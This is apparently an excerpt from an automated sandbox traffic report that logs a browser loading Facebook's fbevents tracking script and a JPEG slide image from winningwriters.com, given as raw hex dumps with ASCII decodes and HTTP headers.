                                                                                                                                                                                            2024-11-18 20:00:08 UTC15573INData Raw: 41 4c 4c 20 54 48 45 20 41 55 54 48 4f 52 53 20 4f 52 0a 2a 20 43 4f 50 59 52 49 47 48 54 20 48 4f 4c 44 45 52 53 20 42 45 20 4c 49 41 42 4c 45 20 46 4f 52 20 41 4e 59 20 43 4c 41 49 4d 2c 20 44 41 4d 41 47 45 53 20 4f 52 20 4f 54 48 45 52 20 4c 49 41 42 49 4c 49 54 59 2c 20 57 48 45 54 48 45 52 0a 2a 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e 20 4f 46 20 43 4f 4e 54 52 41 43 54 2c 20 54 4f 52 54 20 4f 52 20 4f 54 48 45 52 57 49 53 45 2c 20 41 52 49 53 49 4e 47 20 46 52 4f 4d 2c 20 4f 55 54 20 4f 46 20 4f 52 20 49 4e 0a 2a 20 43 4f 4e 4e 45 43 54 49 4f 4e 20 57 49 54 48 20 54 48 45 20 53 4f 46 54 57 41 52 45 20 4f 52 20 54 48 45 20 55 53 45 20 4f 52 20 4f 54 48 45 52 20 44 45 41 4c 49 4e 47 53 20 49 4e 20 54 48 45 20 53 4f 46 54 57 41 52 45 2e 0a 2a 2f 0a 28
                                                                                                                                                                                            Data Ascii: ALL THE AUTHORS OR* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.*/(
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1500INData Raw: 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3a 22 40 40 69 74 65 72 61 74 6f 72 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 61 21 3d 3d 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                            Data Ascii: =typeof Symbol==="function"&&typeof (typeof Symbol==="function"?Symbol.iterator:"@@iterator")==="symbol"?function(a){return typeof a}:function(a){return a&&typeof Symbol==="function"&&a.constructor===Symbol&&a!==(typeof Symbol==="function"?Symbol.prototyp
                                                                                                                                                                                            2024-11-18 20:00:09 UTC14884INData Raw: 65 74 3b 61 3d 61 2e 70 69 78 65 6c 3b 72 65 74 75 72 6e 20 69 28 7b 65 78 74 72 61 63 74 6f 72 73 42 79 50 69 78 65 6c 73 3a 67 2c 66 62 71 49 6e 73 74 61 6e 63 65 3a 65 2c 70 69 78 65 6c 3a 61 2c 74 61 72 67 65 74 3a 62 7d 29 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 69 77 6c 70 61 72 61 6d 65 74 65 72 73 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 69 77 6c 70 61 72 61 6d 65 74 65 72 73 22 2c 65
                                                                                                                                                                                            Data Ascii: et;a=a.pixel;return i({extractorsByPixels:g,fbqInstance:e,pixel:a,target:b})})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.iwlparameters");f.registerPlugin&&f.registerPlugin("fbevents.plugins.iwlparameters",e
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1500INData Raw: 65 6e 67 74 68 3e 30 3b 66 3d 6e 2e 6c 65 6e 67 74 68 3e 30 3b 69 66 28 6b 7c 7c 66 29 7b 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 28 22 66 62 65 76 65 6e 74 73 3a 65 6e 64 3a 75 6e 77 61 6e 74 65 64 44 61 74 61 50 72 6f 63 65 73 73 69 6e 67 22 2c 62 2e 69 64 29 3b 67 2e 6c 6f 67 55 73 65 72 45 72 72 6f 72 28 7b 74 79 70 65 3a 22 55 4e 57 41 4e 54 45 44 5f 43 55 53 54 4f 4d 5f 44 41 54 41 22 7d 29 3b 70 3d 7b 7d 3b 6b 26 26 28 70 2e 75 70 3d 6d 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 66 26 26 28 70 2e 72 70 3d 6e 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 72 65 74 75 72 6e 20 70 7d 7d 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 28 22 66 62 65 76 65 6e 74 73 3a 65 6e 64 3a 75 6e 77 61 6e 74 65 64 44 61 74 61 50 72 6f 63 65 73 73 69 6e 67 22 2c 62 2e
                                                                                                                                                                                            Data Ascii: ength>0;f=n.length>0;if(k||f){a.performanceMark("fbevents:end:unwantedDataProcessing",b.id);g.logUserError({type:"UNWANTED_CUSTOM_DATA"});p={};k&&(p.up=m.join(","));f&&(p.rp=n.join(","));return p}}a.performanceMark("fbevents:end:unwantedDataProcessing",b.
                                                                                                                                                                                            2024-11-18 20:00:09 UTC14884INData Raw: 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 2c 65 2e 65 78 70 6f 72 74 73 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d
                                                                                                                                                                                            Data Ascii: xports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.unwanteddata");f.registerPlugin&&f.registerPlugin("fbevents.plugins.unwanteddata",e.exports);f.ensureModuleRegistered("fbevents.plugins.unwanteddata",function(){return e.exports}
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1500INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 48 28 62 2c 63 2c 64 2c 66 29 7b 76 61 72 20 67 3d 49 5b 62 2e 69 64 5d 3b 64 2e 63 73 5f 65 73 74 3d 21 30 3b 69 66 28 67 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 6e 28 67 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 72 79 7b 69 66 28 74 2e 69 73 4d 61 74 63 68 45 53 54 52 75 6c 65 28 67 2e 63 6f 6e 64 69 74 69 6f 6e 2c 63 29 29 7b 69 66 28 67 2e 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 6e 28 67 2e 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 69 66 28 63 21 3d 3d 70 2e 44 45 52 49 56 45 5f 45 56 45 4e 54 29 72 65 74 75 72 6e 3b 63 3d 61 28 7b 7d 2c 64 29 3b 76 61 72 20 68 3d 7b 65 76 65 6e 74 49 44 3a 66 7d 3b 67 2e 72 75 6c 65 5f 69 64
                                                                                                                                                                                            Data Ascii: e}function H(b,c,d,f){var g=I[b.id];d.cs_est=!0;if(g==null)return;n(g,function(g){try{if(t.isMatchESTRule(g.condition,c)){if(g.transformations==null)return;n(g.transformations,function(c){if(c!==p.DERIVE_EVENT)return;c=a({},d);var h={eventID:f};g.rule_id
                                                                                                                                                                                            2024-11-18 20:00:09 UTC14884INData Raw: 6e 64 3a 65 73 74 50 61 67 65 56 69 65 77 50 72 6f 63 65 73 73 69 6e 67 22 29 3b 72 65 74 75 72 6e 7b 63 73 5f 65 73 74 3a 21 30 2c 65 73 74 5f 73 6f 75 72 63 65 3a 69 7d 7d 72 65 74 75 72 6e 7b 7d 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 2c 65 2e 65 78 70 6f 72 74 73 29 3b
                                                                                                                                                                                            Data Ascii: nd:estPageViewProcessing");return{cs_est:!0,est_source:i}}return{}})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.estruleengine");f.registerPlugin&&f.registerPlugin("fbevents.plugins.estruleengine",e.exports);
                                                                                                                                                                                            2024-11-18 20:00:09 UTC2558INData Raw: 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69
                                                                                                                                                                                            Data Ascii: Modules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.plugi


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            50192.168.2.164977566.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC690OUTGET /graphics/wergle/garnham_home_page_slide_a.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
                                                                                                                                                                                            2024-11-18 20:00:08 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 15 Aug 2024 02:38:57 GMT
                                                                                                                                                                                            ETag: "23074-61fafbe9ab9e7"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 143476
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:08 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:08 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: b2 23 89 2c cc 4a 9a 7e 3a 90 e2 c2 da 22 8b 14 6d 2a 35 20 e0 3c 89 ee 86 e3 dc 7d 9a ee fc eb a6 dd 9b 72 b6 46 bd ee 69 72 e1 5e 98 6d 28 7e 43 33 19 69 c5 42 2c ba 94 a5 c5 a5 f6 94 94 b6 e2 74 ad 65 43 50 52 ab 80 b1 9d b5 fa 85 bb 6e b9 2d 30 f5 9a e2 f5 fa 69 52 a7 26 c3 29 b6 a4 b4 a4 36 35 bc ab 34 f7 14 87 54 a3 99 4b 46 bc 46 9c 03 cd d3 ea 52 1d 96 ed 67 ba 3a ef fa de c4 f0 91 66 bc b2 86 9b b6 cb 88 e9 79 2a ea bb 09 e2 e2 55 ac 05 32 a2 14 06 43 24 e0 29 d6 c0 ef 2c 5b 07 70 a6 a6 53 bf 2d b5 0c 97 9b bd 47 71 f5 a1 52 5b 8f 29 26 0c a8 ea 71 4a 40 7e 3c 74 86 16 49 d0 b0 da 52 92 9c b0 12 9f 7a fe a6 2c db a5 49 b7 ed eb 8b f1 ed df 33 73 b8 17 52 90 d4 d8 f1 a1 88 aa 43 72 5b 78 25 48 53 f2 d2 80 96 6a 3f 0e aa 5d 41 03 00 0b dc 0f aa 5d
                                                                                                                                                                                            Data Ascii: #,J~:"m*5 <}rFir^m(~C3iB,teCPRn-0iR&)654TKFFRg:fy*U2C$),[pS-GqR[)&qJ@~<tIRz,I3sRCr[x%HSj?]A]
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: a2 0c 74 32 c3 21 a5 2d 69 12 64 1a 12 1a 04 0d 28 07 86 55 a9 c0 7a 1c c4 04 c3 9a c4 1b 1a 65 c8 4a 80 45 93 6b 5b 1b 43 50 d0 80 c8 51 2f 64 03 8e 69 f5 a9 4b 58 20 53 de 0f dd bf 6b 6e ef a9 d7 cb 7e e1 92 fb 6b 8b 11 46 d3 6a 8c e2 d8 0e be d2 ca 64 85 a9 34 52 96 df a7 d3 c0 0c f0 0c dd cb 91 19 3b 95 98 71 59 65 91 6a 8c 18 53 6d 36 94 25 29 0b ab 29 a0 14 3a 53 a8 03 c7 3c 04 5d 78 b2 4e ba 4b 8b 7f 80 fe 9d 61 08 b9 bd d5 0d b4 c2 61 54 a9 4a 48 e2 54 93 42 3e ef 1c 00 3c 92 d5 da e7 70 b9 a5 34 89 3a 42 9f 09 3c 5e 3c 89 1f c9 95 40 e7 80 5b ce bc b0 05 f1 99 76 34 38 ad 32 ce b3 25 0a 76 4c 9d 49 1d 35 14 82 81 a4 e6 aa f0 14 e1 c7 00 d5 22 e3 6d 60 b8 c4 b9 6c b3 32 a3 aa 8c ca f2 1e 9e a1 48 39 81 e3 80 d1 c4 21 c6 03 cd ad 2e a0 fa 9b 71 06
                                                                                                                                                                                            Data Ascii: t2!-id(UzeJEk[CPQ/diKX Skn~kFjd4R;qYejSm6%)):S<]xNKaaTJHTB><p4:B<^<@[v482%vLI5"m`l2H9!.q
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 66 b8 a5 ce dc b7 c5 d5 6e 34 1e 59 2b 50 15 0b 94 f7 04 27 d0 3d 6a 03 01 11 f7 1b 70 4d b8 cf 7a 32 94 17 25 6a f9 9b 9f 41 01 b4 f5 54 3f 0d a4 24 7a 5b 43 69 a0 4a 47 01 4c 02 bd ab b6 d1 6c 62 23 85 21 57 09 27 aa 8d 23 e3 79 d1 40 01 15 24 0f 13 80 b3 16 c8 02 db 06 3c 0a eb 71 03 5c c5 8f bc ea b3 5f 1f 3c 87 b3 00 3b 72 98 66 cb d0 3f 29 82 42 3c cf 02 70 1c 35 a5 22 84 e6 79 71 38 0f 9d 40 4e 49 5d 3c 74 e0 25 5d 88 53 fa 7c e7 2a 34 25 df 41 39 66 53 42 30 16 e3 b4 11 90 f6 d7 bd 25 43 5a a4 49 7b 4b 55 e3 f8 09 46 74 f3 39 60 2d 4d a5 ca 5b ec b0 1b 25 29 87 0d 96 94 d0 e1 54 a4 0a 9f 01 96 58 03 a8 88 01 a4 90 28 30 0a f0 19 80 cc 07 27 1c 08 07 f6 e0 04 ee 12 94 f1 28 19 36 8f 8a 82 a1 5e 18 06 f4 a0 38 41 23 2a d3 4e 75 af 90 18 02 18 36 c5
                                                                                                                                                                                            Data Ascii: fn4Y+P'=jpMz2%jAT?$z[CiJGLlb#!W'#y@$<q\_<;rf?)B<p5"yq8@NI]<t%]S|*4%A9fSB0%CZI{KUFt9`-M[%)TX(0'(6^8A#*Nu6
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 23 80 ae f8 03 4d 8f 78 83 68 b8 cc 17 07 7e 5d 89 cc 06 d3 20 82 52 85 a1 5a 86 a0 2a 68 46 55 a6 02 7e d8 86 cb ba 6e 77 25 37 20 4c 8f 61 e8 a9 e6 42 4f 4e 42 dd d4 51 42 73 28 49 4e 79 66 72 e1 80 98 24 12 a2 a5 1c d4 79 e0 18 a5 8d 48 71 3f cc 93 96 02 bc f7 43 b9 56 dd 8a d1 84 d3 68 b9 6e 89 48 d5 0e d4 49 e9 b0 95 0f 4b d2 88 cd 29 e6 94 7c 4a f2 19 e0 29 bc 9b a5 ca f3 71 91 77 ba cc 72 75 c6 5a b5 48 94 e7 13 e0 94 81 92 52 91 90 48 c8 0c 03 dc 45 87 02 73 29 50 a5 70 0f ad 67 40 40 af 2c 03 9b 20 8a 0e 3e 78 07 06 c8 c0 29 49 af 1c bd 98 0e c3 cb 01 d0 7b 6b fb 30 1b 69 cf d5 96 03 ea 45 07 0c f0 1d 90 38 50 67 ee c0 2e 68 56 9f bb 00 f9 17 55 45 3e cc 01 34 3a 7a 79 60 0d ed d4 05 04 fd 98 09 0a d7 43 a3 01 23 5a be ee 59 57 01 22 db 05 4a 79
                                                                                                                                                                                            Data Ascii: #Mxh~] RZ*hFU~nw%7 LaBONBQBs(INyfr$yHq?CVhnHIK)|J)qwruZHRHEs)Ppg@@, >x)I{k0iE8Pg.hVUE>4:zy`C#ZYW"Jy
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: a8 9c c8 c8 79 05 dc ed 5d b7 b4 01 b8 0d 6f fb eb ce 6e 0a 92 9b 74 84 38 8b 63 4d 85 10 ca 50 86 40 40 05 14 3f 88 78 d7 2a 66 42 ff 00 59 a0 da 62 41 8a 2c c8 8f f2 05 b4 fc 9a e3 68 2d 74 c8 a8 e9 e8 f4 e9 3f d5 cb 00 e8 a5 25 23 52 8d 00 e2 70 15 73 bb 7f 51 fb 4f 6c 75 b6 d5 85 9b 7e ed dc 52 12 12 60 3e e8 54 46 f5 1a 20 ba 10 97 16 b0 48 c8 00 12 7f 9f 01 e5 3f 73 1f b8 ee 8d c5 74 b8 6e 48 ed a2 f7 71 5a 10 62 c2 8c 98 2d c7 01 21 a6 da 8e ca 28 34 50 01 43 5a 9a 9a d4 93 80 55 1f 61 76 ff 00 b7 f6 f8 2a ee 04 e9 17 0b cd df 58 76 3b 3d 4e 83 60 0a 2c 74 5a cc a5 ba d1 4e 28 fc 59 01 80 5b b9 fb 43 b7 a6 58 7f 56 d8 9a 93 29 b6 4c a8 b1 c4 92 fc 59 d1 d2 9a a9 0d 29 5f 02 80 04 a4 83 99 f4 90 30 10 25 8f 64 5f 77 03 11 5f 88 da db 88 ce be 95 ea
                                                                                                                                                                                            Data Ascii: y]ont8cMP@@?x*fBYbA,h-t?%#RpsQOlu~R`>TF H?stnHqZb-!(4PCZUav*Xv;=N`,tZN(Y[CXV)LY)_0%d_w_
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: e4 ae 23 7d 41 ad 2a 41 07 e6 5c 58 3c 41 15 07 01 08 bd da b8 6b dd 70 ad c8 98 6d db 72 e2 85 4b 8e a5 bb 57 fa 48 f5 2e 1a 54 45 03 9a 73 0a 27 e0 f5 66 46 01 97 7c 6e 66 ae 17 98 76 cb 24 56 e2 6d 7d b0 d9 89 61 65 84 e9 43 95 23 ac f7 89 d6 a1 40 4e 64 0a 9c ce 02 e1 76 6f bd f2 a6 76 22 0f 65 13 19 d8 b6 dd b7 72 99 3f 72 5c 5e 52 03 33 63 ce 94 e4 98 91 1b 40 55 7a 6d 92 a5 3a 16 34 a8 e9 19 a7 56 01 9b 78 c9 85 7e b6 3b 1b 72 5b 63 0b 23 8d ba da d9 73 4a a4 82 32 8d f2 4e 20 50 2d 67 30 01 ad 48 19 e7 80 a1 72 a3 b9 16 44 b8 6e 05 21 71 9d 71 87 1b 5d 35 02 85 14 14 ac 0c aa 38 1a 65 5c 03 78 b7 db e4 3c da 24 b4 96 99 53 89 0f 3c da 4e a4 a0 9f 51 01 34 a9 a6 02 4f 91 3a d2 f4 43 01 13 23 1b 1a 9a 31 d1 10 48 28 4b 2d 86 ca 10 0c 65 34 0a 85 68
                                                                                                                                                                                            Data Ascii: #}A*A\X<AkpmrKWH.TEs'fF|nfv$Vm}aeC#@Ndvov"er?r\^R3c@Uzm:4Vx~;r[c#sJ2N P-g0HrDn!qq]58e\x<$S<NQ4O:C#1H(K-e4h
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: ba eb 6c b6 e3 ce af a6 d3 23 53 8b 3c 12 91 c4 9a 72 18 0e 84 0a 29 2a a1 4a d2 52 a1 5c 8a 48 cf 3e 60 8c 04 17 b8 2d 3f a6 5c 64 b4 ca 54 23 85 6a 69 2a 20 90 93 98 e1 cb c2 b9 e0 18 30 02 d7 76 1a 72 53 cd b8 80 b4 2b 4b 85 04 02 2a b1 5a 8a 8f 6f 0c 06 f6 3d 9d 6d bc 3c eb 92 a3 48 f9 18 c0 ad c6 21 15 19 32 1c 09 2a 4c 76 42 c9 4e a5 d2 9c bd a2 b8 07 6d cd db 9b 6b f0 c4 cb 2d a5 fb 1c 78 b0 d0 56 5f 71 d5 ca f9 ba 85 ba c4 98 ea 0a 6c 04 37 42 56 97 2b ac 14 d3 4d 0e 00 4f 64 6c f8 d3 37 25 bd 9b c6 8b 85 b0 97 09 86 da 94 da a4 3c 12 4b 4c 1e 60 2d 5c 4d 70 1e 8d 76 fb e9 13 6d 6f 14 d9 77 35 e0 c5 b6 da 90 b6 64 aa c3 61 7d 5d 37 54 9a 2f a3 2d c5 57 49 15 01 61 ba 1e 29 a8 c0 77 ef cf d1 f4 d7 e4 bf ba 7b 42 98 d1 92 fa 75 dd 36 87 cc 26 02 1a
                                                                                                                                                                                            Data Ascii: l#S<r)*JR\H>`-?\dT#ji* 0vrS+K*Zo=m<H!2*LvBNmk-xV_ql7BV+MOdl7%<KL`-\Mpvmow5da}]7T/-WIa)w{Bu6&
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 8d 0b 00 1a 03 80 5a d5 a7 b7 db 97 b7 d7 2b 1d bb b8 92 d7 07 65 cf ff 00 50 49 ba ca b5 38 db b0 e2 cc 02 33 c9 e8 05 12 e3 6b 73 49 25 27 d2 78 8c 00 5b 7b 0b 67 b2 14 bf fd db b2 48 69 49 3a 02 20 4d 2e 83 e3 d3 d3 4a f8 67 80 93 b7 ad 93 6c 5d 27 da af ef 6f 76 2d 6e 5e ad 10 dc 8e 24 43 7d 48 94 d4 76 c4 73 21 b2 dd 48 52 ca 33 42 b8 1c 06 db 4e d1 b7 5b 93 78 b6 5b f7 8b 37 61 7f b5 3f 11 51 3e 4d e6 9c 1a 07 57 5f ab d2 74 69 27 4f 13 cb 3c 07 0d a9 6c da cb bd 43 7a df b8 e4 5e 26 c3 42 9f 4c 74 c2 53 2c 1a 27 4e a2 b5 9a 8a 15 70 a6 67 01 25 de 14 44 65 25 2a d2 29 45 0e 66 9e 18 08 f9 d5 c7 5b 93 50 a4 ad 45 0d a3 ac 05 28 42 78 04 f9 e7 80 7b 69 d3 68 8a db 2b 0b 54 89 03 53 76 f7 57 ab a0 da 87 c4 7f 91 4a 1c 86 03 44 7c ab ad b6 50 9e 81 a9
                                                                                                                                                                                            Data Ascii: Z+ePI83ksI%'x[{gHiI: M.Jgl]'ov-n^$C}Hvs!HR3BN[x[7a?Q>MW_ti'O<lCz^&BLtS,'Npg%De%*)Ef[PE(Bx{ih+TSvWJD|P
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: fa 95 ed 67 59 f9 1d cd db 35 98 50 96 db dd f0 50 de 95 9d 3f 86 d4 f6 c0 f8 89 f4 a1 de 75 a2 f3 a9 a0 42 fd 9c 72 55 bf b8 96 45 b5 d4 8e e1 87 2e 3a 14 09 49 1f e1 ce 55 cb 2f 4e 02 56 df 3b 2a 2e f3 ef f6 e1 76 f3 72 6e c9 b6 ad b6 4b 76 e4 bf dc 1d 71 0c 92 cf ca b3 46 59 52 d6 84 f5 1d 70 36 81 ea f4 ea 27 95 30 13 56 da ec 43 90 b7 84 7e e3 47 b5 c3 db d7 cb c8 7a 6c e7 d9 71 32 5d 4c 37 94 95 a5 2d f4 ce 94 36 d0 d4 b4 94 24 13 d4 51 51 a9 38 0a bb de e3 68 b9 f7 0e 75 da d2 97 91 b8 6f d3 25 26 f7 b7 14 5b 58 61 e4 13 1e 29 43 8d f1 54 90 90 b2 82 2a 92 45 78 e0 26 9e e7 d8 e0 f6 c7 b3 3b 77 6e ba e1 4d c5 d6 7f 49 78 37 c5 d9 b2 95 f3 57 07 eb cf 40 1a 3e cc 04 73 b5 76 b6 e6 79 e8 3b 7e 65 a4 30 e9 85 f3 96 fb 9b 8e a1 c6 0c 7c 94 94 b8 a4 54
